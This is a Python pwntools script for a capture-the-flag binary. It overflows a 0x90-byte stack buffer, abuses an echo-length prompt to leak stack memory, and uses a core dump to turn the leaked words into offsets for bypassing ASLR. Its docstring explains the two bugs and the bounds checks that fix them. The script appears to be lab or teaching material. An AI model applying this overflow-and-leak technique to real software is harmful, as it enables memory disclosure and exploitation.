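#!/usr/bin/env python
"""Collect stack offsets of the values leaked by the ./aslr-3 CTF binary.

The target copies an unbounded input into a 0x90-byte stack buffer and then
echoes back as many bytes as the user asks for, so asking for more than the
buffer holds returns stack memory that lies past the buffer.  After the
deliberate crash, a core dump is used to locate the buffer and express every
leaked word as an offset from it -- the information that lets the leak be
reused against an ASLR-randomised layout.

From a defender's point of view there are two bugs here: the unchecked write
(visible as the crash with the return address set to 0x41414141) and the
over-read that echoes memory beyond the buffer.  Bounds-checking both the
copy and the echo length closes the leak.
"""
import re

from pwn import *

# Size of the target's stack buffer; also the length of the 'A' filler.
BUFFER_SIZE = 0x90

p = process('./aslr-3')

# Overflow the buffer so the saved return address becomes 0x41414141
# ('AAAA'); the process crashes when the function returns.
p.sendline("A" * BUFFER_SIZE)

# Answer the "how many bytes to print?" prompt with more than the buffer holds.
print(p.recvuntil('print?\n'))
p.sendline('256')

# Read the echo.  recv() returns *up to* 0x200 bytes, so the length of
# `data` is not guaranteed.
data = p.recv(0x200)

# Drop the 144 filler bytes at the front and the trailing 'Hello !\n' (8 bytes).
raw_data = data[BUFFER_SIZE:-8]

# Decode each complete 4-byte little-endian word as a candidate address.
# Only whole words are decoded: a trailing partial word (possible after a
# short read) would make u32() raise.
word_count = len(raw_data) // 4
addrs = [u32(raw_data[i * 4:i * 4 + 4]) for i in range(word_count)]

# Wait for the crash so the core file exists (assumes core dumps are enabled
# and written to ./core -- TODO confirm on the target host).
p.wait()

# Find the filler inside the core's stack mapping and express every leaked
# value relative to the buffer start.
c = Core('core')
buffer_addr = c.stack.find('A' * BUFFER_SIZE)
offsets = [addr - buffer_addr for addr in addrs]
print(offsets)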